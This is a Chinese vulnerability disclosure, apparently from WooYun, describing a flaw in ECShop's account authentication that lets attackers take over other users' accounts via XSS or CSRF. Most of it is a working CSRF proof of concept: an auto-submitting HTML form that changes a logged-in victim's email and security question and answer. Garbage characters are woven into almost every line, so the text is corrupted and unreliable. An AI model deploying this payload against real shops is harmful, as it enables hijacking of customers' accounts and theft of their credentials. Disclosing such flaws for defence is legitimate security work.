简要描述:
# I2 e s+ _, u( ?ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
( t) h2 F! U0 L& E
8 h* P* \! k1 T7 s9 w8 N& eDemo For:http://www.wooyun.org/bug.php?action=view&id=395
6 C' ~& m8 R) P* j" z4 X1 M
) B& P; [( a0 b9 @2 Z) O$ B详细说明:2 @9 K# K( t& G- I K
利用csrf和xss可以突破官方所说的“障碍”8 I, m. \+ e" p8 q
xss版本已经有人说明
2 E& ? F# p- h: I/ y) }这里给出csrf版本) b. U8 g: ~ L3 r. v
& K# n6 b2 u& g6 h
漏洞证明:+ Q' ~6 o/ S+ z. v( ~
<html>
; Y3 O9 m1 Y6 a0 ^) B* h: E* B<body>
! |. F) D* E; t3 D3 D$ D! C$ Y<form action="http://www.wooyun.org/ecshop/user.php" method="POST">$ K$ L3 V% p t" O/ K% o6 W
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
5 H6 `1 l* ~) q5 {& m* R3 `<INPUT TYPE="text" NAME="act" value="act_edit_profile">+ a4 ~- ~) r" O9 }
<INPUT TYPE="text" NAME="sel_question" value="ecshop">* Y' ?% Y+ ~. m9 [5 n
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">6 @1 J" g/ X J" o: F
</body>
H" [1 N% M% @! y7 \. o<script>! h$ f. Y# F( X* a
document.forms[0].submit();
3 V! ?+ j$ R6 K( R& A+ h</script>
/ e" k& m6 r" d0 W0 S* ~; D</html>
0 j% {+ t3 n8 S' \2 E4 N( S. R构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
4 }- t8 o: z4 o8 H
. U* H! T8 e1 Q# h8 O |